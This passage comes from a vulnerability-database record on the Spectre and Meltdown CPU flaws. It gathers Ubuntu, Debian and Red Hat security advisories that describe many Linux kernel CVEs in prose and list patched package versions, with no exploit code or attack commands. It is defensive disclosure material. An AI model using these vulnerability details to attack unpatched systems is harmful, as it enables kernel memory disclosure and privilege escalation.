      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "154514"
      },
      {
        "db": "PACKETSTORM",
        "id": "154951"
      }
    ],
    "trust": 0.2
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat Security Advisory 2019-2901-01",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "154602"
      }
    ],
    "trust": 0.1
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "overflow",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "154602"
      },
      {
        "db": "PACKETSTORM",
        "id": "154562"
      },
      {
        "db": "PACKETSTORM",
        "id": "154659"
      },
      {
        "db": "PACKETSTORM",
        "id": "154570"
      },
      {
        "db": "PACKETSTORM",
        "id": "154540"
      }
    ],
    "trust": 0.5
  }
}

var-201801-1712
Vulnerability from variot

Systems with microprocessors utilizing speculative execution and branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis. Two vulnerabilities are identified, known as "Variant 3a" and "Variant 4". CPUhardware is a set of firmware that runs in the CPU (Central Processing Unit) for managing and controlling the CPU. The Meltdown vulnerability exists in the CPU processor core, which \"melts\" the security boundary implemented by hardware, allowing low-privileged user-level applications to \"cross-border\" access to system-level memory, causing data leakage. Multiple CPU Hardware are prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in further attacks. The following products and versions are affected: ARM Cortex-R7; Cortex-R8; Cortex-A8; Cortex-A9; Cortex-A12; Xeon CPU E5-1650 v3, v2, v4; Xeon E3-1265l v2, v3, v4 ; Xeon E3-1245 v2, v3, v5, v6 versions; Xeon X7542, etc. Relevant releases/architectures:

Image Updates for RHV-H - noarch

  1. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks. ========================================================================== Ubuntu Security Notice USN-3540-2 January 23, 2018

linux-lts-xenial, linux-aws vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 14.04 LTS

Summary:

Several security issues were addressed in the Linux kernel. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS. This flaw is known as Spectre. (CVE-2017-5715, CVE-2017-5753)

USN-3522-2 mitigated CVE-2017-5754 (Meltdown) for the amd64 architecture in the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS. This flaw is known as Meltdown. (CVE-2017-5754)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 14.04 LTS: linux-image-4.4.0-1011-aws 4.4.0-1011.11 linux-image-4.4.0-111-generic 4.4.0-111.134~14.04.1 linux-image-4.4.0-111-lowlatency 4.4.0-111.134~14.04.1 linux-image-4.4.0-111-powerpc-e500mc 4.4.0-111.134~14.04.1 linux-image-4.4.0-111-powerpc-smp 4.4.0-111.134~14.04.1 linux-image-4.4.0-111-powerpc64-emb 4.4.0-111.134~14.04.1 linux-image-4.4.0-111-powerpc64-smp 4.4.0-111.134~14.04.1 linux-image-aws 4.4.0.1011.11 linux-image-generic-lts-xenial 4.4.0.111.95 linux-image-lowlatency-lts-xenial 4.4.0.111.95 linux-image-powerpc-e500mc-lts-xenial 4.4.0.111.95 linux-image-powerpc-smp-lts-xenial 4.4.0.111.95 linux-image-powerpc64-emb-lts-xenial 4.4.0.111.95 linux-image-powerpc64-smp-lts-xenial 4.4.0.111.95

Please note that fully mitigating CVE-2017-5715 (Spectre Variant 2) requires corresponding processor microcode/firmware updates or, in virtual environments, hypervisor updates. Ubuntu is working with Intel and AMD to provide future microcode updates that implement IBRS and IBPB as they are made available. Ubuntu users with a processor from a different vendor should contact the vendor to identify necessary firmware updates. Ubuntu will provide corresponding QEMU updates in the future for users of self-hosted virtual environments in coordination with upstream QEMU. Ubuntu users in cloud environments should contact the cloud provider to confirm that the hypervisor has been updated to expose the new CPU features to virtual machines. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512


Debian Security Advisory DSA-4187-1 security@debian.org https://www.debian.org/security/ Ben Hutchings May 01, 2018 https://www.debian.org/security/faq


Package : linux CVE ID : CVE-2015-9016 CVE-2017-0861 CVE-2017-5715 CVE-2017-5753 CVE-2017-13166 CVE-2017-13220 CVE-2017-16526 CVE-2017-16911 CVE-2017-16912 CVE-2017-16913 CVE-2017-16914 CVE-2017-18017 CVE-2017-18203 CVE-2017-18216 CVE-2017-18232 CVE-2017-18241 CVE-2018-1066 CVE-2018-1068 CVE-2018-1092 CVE-2018-5332 CVE-2018-5333 CVE-2018-5750 CVE-2018-5803 CVE-2018-6927 CVE-2018-7492 CVE-2018-7566 CVE-2018-7740 CVE-2018-7757 CVE-2018-7995 CVE-2018-8781 CVE-2018-8822 CVE-2018-1000004 CVE-2018-1000199

Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

CVE-2015-9016

Ming Lei reported a race condition in the multiqueue block layer
(blk-mq).  On a system with a driver using blk-mq (mtip32xx,
null_blk, or virtio_blk), a local user might be able to use this
for denial of service or possibly for privilege escalation.

CVE-2017-0861

Robb Glasser reported a potential use-after-free in the ALSA (sound)
PCM core.  We believe this was not possible in practice.

CVE-2017-5715

Multiple researchers have discovered a vulnerability in various
processors supporting speculative execution, enabling an attacker
controlling an unprivileged process to read memory from arbitrary
addresses, including from the kernel and all other processes
running on the system.

This specific attack has been named Spectre variant 2 (branch
target injection) and is mitigated for the x86 architecture (amd64
and i386) by using the "retpoline" compiler feature which allows
indirect branches to be isolated from speculative execution.

CVE-2017-5753

Multiple researchers have discovered a vulnerability in various
processors supporting speculative execution, enabling an attacker
controlling an unprivileged process to read memory from arbitrary
addresses, including from the kernel and all other processes
running on the system.

This specific attack has been named Spectre variant 1
(bounds-check bypass) and is mitigated by identifying vulnerable
code sections (array bounds checking followed by array access) and
replacing the array access with the speculation-safe
array_index_nospec() function.

More use sites will be added over time.

CVE-2017-13166

A bug in the 32-bit compatibility layer of the v4l2 ioctl handling
code has been found. Memory protections ensuring user-provided
buffers always point to userland memory were disabled, allowing
destination addresses to be in kernel space. On a 64-bit kernel a
local user with access to a suitable video device can exploit this
to overwrite kernel memory, leading to privilege escalation.

CVE-2017-13220

Al Viro reported that the Bluetooth HIDP implementation could
dereference a pointer before performing the necessary type check. 
A local user could use this to cause a denial of service.

CVE-2017-16526

Andrey Konovalov reported that the UWB subsystem may dereference
an invalid pointer in an error case.  A local user might be able
to use this for denial of service.

CVE-2017-16911

Secunia Research reported that the USB/IP vhci_hcd driver exposed
kernel heap addresses to local users.

CVE-2017-16912

Secunia Research reported that the USB/IP stub driver failed to
perform a range check on a received packet header field, leading
to an out-of-bounds read.  A remote user able to connect to the
USB/IP server could use this for denial of service.

CVE-2017-16913

Secunia Research reported that the USB/IP stub driver failed to
perform a range check on a received packet header field, leading
to excessive memory allocation.  A remote user able to connect to
the USB/IP server could use this for denial of service.

CVE-2017-16914

Secunia Research reported that the USB/IP stub driver failed to
check for an invalid combination of fields in a received packet,
leading to a null pointer dereference.  A remote user able to
connect to the USB/IP server could use this for denial of service.

CVE-2017-18017

Denys Fedoryshchenko reported that the netfilter xt_TCPMSS module
failed to validate TCP header lengths, potentially leading to a
use-after-free.  If this module is loaded, it could be used by a
remote attacker for denial of service or possibly for code
execution.

CVE-2017-18203

Hou Tao reported that there was a race condition in creation and
deletion of device-mapper (DM) devices.  A local user could
potentially use this for denial of service.

CVE-2017-18216

Alex Chen reported that the OCFS2 filesystem failed to hold a
necessary lock during nodemanager sysfs file operations,
potentially leading to a null pointer dereference.  A local user
could use this for denial of service.

CVE-2017-18232

Jason Yan reported a race condition in the SAS (Serial-Attached
SCSI) subsystem, between probing and destroying a port.  This
could lead to a deadlock.  A physically present attacker could
use this to cause a denial of service.

CVE-2017-18241

Yunlei He reported that the f2fs implementation does not properly
initialise its state if the "noflush_merge" mount option is used. 
A local user with access to a filesystem mounted with this option
could use this to cause a denial of service.

CVE-2018-1066

Dan Aloni reported to Red Hat that the CIFS client implementation
would dereference a null pointer if the server sent an invalid
response during NTLMSSP setup negotiation.  This could be used
by a malicious server for denial of service.

CVE-2018-1068

The syzkaller tool found that the 32-bit compatibility layer of
ebtables did not sufficiently validate offset values. On a 64-bit
kernel, a local user with the CAP_NET_ADMIN capability (in any user
namespace) could use this to overwrite kernel memory, possibly
leading to privilege escalation. Debian disables unprivileged user
namespaces by default.

CVE-2018-1092

Wen Xu reported that a crafted ext4 filesystem image would
trigger a null dereference when mounted.  A local user able
to mount arbitrary filesystems could use this for denial of
service.

CVE-2018-5332

Mohamed Ghannam reported that the RDS protocol did not
sufficiently validate RDMA requests, leading to an out-of-bounds
write.  A local attacker on a system with the rds module loaded
could use this for denial of service or possibly for privilege
escalation.

CVE-2018-5333

Mohamed Ghannam reported that the RDS protocol did not properly
handle an error case, leading to a null pointer dereference.  A
local attacker on a system with the rds module loaded could
possibly use this for denial of service.

CVE-2018-5750

Wang Qize reported that the ACPI sbshc driver logged a kernel heap
address.

CVE-2018-5803

Alexey Kodanev reported that the SCTP protocol did not range-check
the length of chunks to be created.  A local or remote user could
use this to cause a denial of service.

CVE-2018-6927

Li Jinyue reported that the FUTEX_REQUEUE operation on futexes did
not check for negative parameter values, which might lead to a
denial of service or other security impact.

CVE-2018-7492

The syzkaller tool found that the RDS protocol was lacking a null
pointer check.  A local attacker on a system with the rds module
loaded could use this for denial of service.

CVE-2018-7566

Fan LongFei reported a race condition in the ALSA (sound)
sequencer core, between write and ioctl operations.  This could
lead to an out-of-bounds access or use-after-free.  A local user
with access to a sequencer device could use this for denial of
service or possibly for privilege escalation.

CVE-2018-7740

Nic Losby reported that the hugetlbfs filesystem's mmap operation
did not properly range-check the file offset.  A local user with
access to files on a hugetlbfs filesystem could use this to cause
a denial of service.

CVE-2018-7757

Jason Yan reported a memory leak in the SAS (Serial-Attached
SCSI) subsystem.  A local user on a system with SAS devices
could use this to cause a denial of service.

CVE-2018-7995

Seunghun Han reported a race condition in the x86 MCE
(Machine Check Exception) driver.  This is unlikely to have
any security impact.

CVE-2018-8781

Eyal Itkin reported that the udl (DisplayLink) driver's mmap
operation did not properly range-check the file offset.  A local
user with access to a udl framebuffer device could exploit this to
overwrite kernel memory, leading to privilege escalation.

CVE-2018-8822

Dr Silvio Cesare of InfoSect reported that the ncpfs client
implementation did not validate reply lengths from the server.  An
ncpfs server could use this to cause a denial of service or
remote code execution in the client.

CVE-2018-1000004

Luo Quan reported a race condition in the ALSA (sound) sequencer
core, between multiple ioctl operations.  This could lead to a
deadlock or use-after-free.  A local user with access to a
sequencer device could use this for denial of service or possibly
for privilege escalation.

CVE-2018-1000199

Andy Lutomirski discovered that the ptrace subsystem did not
sufficiently validate hardware breakpoint settings.  Local users
can use this to cause a denial of service, or possibly for
privilege escalation, on x86 (amd64 and i386) and possibly other
architectures.

For the oldstable distribution (jessie), these problems have been fixed in version 3.16.56-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security tracker page at: https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlron61fFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0Rtqw//Xf/L4bP65wU9M59Ef6xBt+Eph+yxeMsioGhu80ODdMemlmHzASMtfZjY AXxyt9l8lbHn8MmwDA4aLhhwHYXwvKATdpHSy1SILrRfb4s9P9uV1vsHaIeZ649E hDyNon9hP2tPso6BwqiYHZZy9Xxtd+T8vTBeBZwUKOLBkBRvV/gyNSUdJWp6L8WH aF4D1hHl9ZotDkyIvkubbx77aqbJ88I4R0n69x7L9udFbuXa+U7hV6dJdnpzyl/7 OukJfEtnkaUgWu0MdOfFss6iH5OQISn/y/ricRi29oKQiEp3YwnT5J9pFwSQeJJS H8ABVt251UoS0J+of3QWw0muOT/6UAF8SNpPKMJXC7Euq8pTmYVPSIeUYf4eqn65 UHZSCKXaszItq+uzVNYdkj504BJ4cG1lFxZtlrFWwKE8p7QOETN0GKvTRdu/SvDd Hl2nb4HouLpBYS518Th2/MGgzhXXAuO12MH3smenptZbqxKn9Z0XSTJYzFupgJk/ kKF2xkDFBE4toTLVE+6XdUKwYk4vkeDZyOGOwRYThSkKAzrUh5zThgal4HnknD2A 5ye4XLhjgSIT47/nmor6lhxd7WGXGkV33GF0azYlHr/sclfzxcU2Ev3NUBWQ8M3s CxfIO0FNCzO0WIUf40md7MlIAnDBIRGyYgNIIe7AnSRKKPykEx8= =wNQS -----END PGP SIGNATURE----- . Summary:

An update for kernel is now available for Red Hat Enterprise Linux 6.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64

Security Fix(es):

An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions (a commonly used performance optimization). There are three primary variants of the issue which differ in the way the speculative execution can be exploited.

Note: This issue is present in hardware and cannot be fully fixed via software update. The updated kernel packages provide software mitigation for this hardware issue at a cost of potential performance penalty. Please refer to References section for further information about this issue and the performance impact.

In this update mitigations for x86-64 architecture are provided.

Variant CVE-2017-5753 triggers the speculative execution by performing a bounds-check bypass. It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory accesses may cause allocation into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to cross the syscall boundary and read privileged memory by conducting targeted cache side-channel attacks. It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory accesses may cause allocation into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to cross the syscall and guest/host boundaries and read privileged memory by conducting targeted cache side-channel attacks. (CVE-2017-5715, Important)

Variant CVE-2017-5754 relies on the fact that, on impacted microprocessors, during speculative execution of instruction permission faults, exception generation triggered by a faulting access is suppressed until the retirement of the whole instruction block. In a combination with the fact that memory accesses may populate the cache even when the block is being dropped and never committed (executed), an unprivileged local attacker could use this flaw to read privileged (kernel space) memory by conducting targeted cache side-channel attacks. (CVE-2017-5754, Important)

Note: CVE-2017-5754 affects Intel x86-64 microprocessors. AMD x86-64 microprocessors are not affected by this issue.

Red Hat would like to thank Google Project Zero for reporting these issues.

  1. Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1519778 - CVE-2017-5753 hw: cpu: speculative execution bounds-check bypass 1519780 - CVE-2017-5715 hw: cpu: speculative execution branch target injection 1519781 - CVE-2017-5754 hw: cpu: speculative execution permission faults handling

  1. Package List:

Red Hat Enterprise Linux Desktop (v. 6):

Source: kernel-2.6.32-696.18.7.el6.src.rpm

i386: kernel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-devel-2.6.32-696.18.7.el6.i686.rpm kernel-headers-2.6.32-696.18.7.el6.i686.rpm perf-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm kernel-doc-2.6.32-696.18.7.el6.noarch.rpm kernel-firmware-2.6.32-696.18.7.el6.noarch.rpm

x86_64: kernel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm kernel-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-headers-2.6.32-696.18.7.el6.x86_64.rpm perf-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm

x86_64: kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm

Red Hat Enterprise Linux HPC Node (v. 6):

Source: kernel-2.6.32-696.18.7.el6.src.rpm

noarch: kernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm kernel-doc-2.6.32-696.18.7.el6.noarch.rpm kernel-firmware-2.6.32-696.18.7.el6.noarch.rpm

x86_64: kernel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm kernel-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-headers-2.6.32-696.18.7.el6.x86_64.rpm perf-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

x86_64: kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm

Red Hat Enterprise Linux Server (v. 6):

Source: kernel-2.6.32-696.18.7.el6.src.rpm

i386: kernel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-devel-2.6.32-696.18.7.el6.i686.rpm kernel-headers-2.6.32-696.18.7.el6.i686.rpm perf-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm kernel-doc-2.6.32-696.18.7.el6.noarch.rpm kernel-firmware-2.6.32-696.18.7.el6.noarch.rpm

ppc64: kernel-2.6.32-696.18.7.el6.ppc64.rpm kernel-bootwrapper-2.6.32-696.18.7.el6.ppc64.rpm kernel-debug-2.6.32-696.18.7.el6.ppc64.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm kernel-debug-devel-2.6.32-696.18.7.el6.ppc64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-696.18.7.el6.ppc64.rpm kernel-devel-2.6.32-696.18.7.el6.ppc64.rpm kernel-headers-2.6.32-696.18.7.el6.ppc64.rpm perf-2.6.32-696.18.7.el6.ppc64.rpm perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm

s390x: kernel-2.6.32-696.18.7.el6.s390x.rpm kernel-debug-2.6.32-696.18.7.el6.s390x.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.s390x.rpm kernel-debug-devel-2.6.32-696.18.7.el6.s390x.rpm kernel-debuginfo-2.6.32-696.18.7.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-696.18.7.el6.s390x.rpm kernel-devel-2.6.32-696.18.7.el6.s390x.rpm kernel-headers-2.6.32-696.18.7.el6.s390x.rpm kernel-kdump-2.6.32-696.18.7.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-696.18.7.el6.s390x.rpm kernel-kdump-devel-2.6.32-696.18.7.el6.s390x.rpm perf-2.6.32-696.18.7.el6.s390x.rpm perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm

x86_64: kernel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm kernel-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-headers-2.6.32-696.18.7.el6.x86_64.rpm perf-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm

ppc64: kernel-debug-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-696.18.7.el6.ppc64.rpm perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm python-perf-2.6.32-696.18.7.el6.ppc64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm

s390x: kernel-debug-debuginfo-2.6.32-696.18.7.el6.s390x.rpm kernel-debuginfo-2.6.32-696.18.7.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-696.18.7.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-696.18.7.el6.s390x.rpm perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm python-perf-2.6.32-696.18.7.el6.s390x.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm

x86_64: kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source: kernel-2.6.32-696.18.7.el6.src.rpm

i386: kernel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-devel-2.6.32-696.18.7.el6.i686.rpm kernel-headers-2.6.32-696.18.7.el6.i686.rpm perf-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm kernel-doc-2.6.32-696.18.7.el6.noarch.rpm kernel-firmware-2.6.32-696.18.7.el6.noarch.rpm

x86_64: kernel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm kernel-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-headers-2.6.32-696.18.7.el6.x86_64.rpm perf-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm

x86_64: kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/security/vulnerabilities/speculativeexecution https://access.redhat.com/security/cve/CVE-2017-5753 https://access.redhat.com/security/cve/CVE-2017-5715 https://access.redhat.com/security/cve/CVE-2017-5754

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

